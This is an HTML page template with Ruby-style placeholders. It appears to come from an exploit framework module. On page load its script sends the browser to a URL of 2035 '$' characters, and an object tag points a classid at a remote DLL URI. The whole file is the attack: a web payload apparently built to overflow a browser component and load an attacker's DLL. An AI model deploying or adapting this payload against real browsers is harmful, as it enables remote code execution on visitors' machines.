<html>
<head>
<script language="javascript">
  function #{j_function}() {
    var #{j_url}='';
    for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++)
      #{j_url}+='$';

    window.location=#{j_url}+'.html';
  }
</script>
</head>
<body onload="#{j_function}()">
  <object classid="#{dll_uri}#GenericControl">
  <object>
</body>
</html>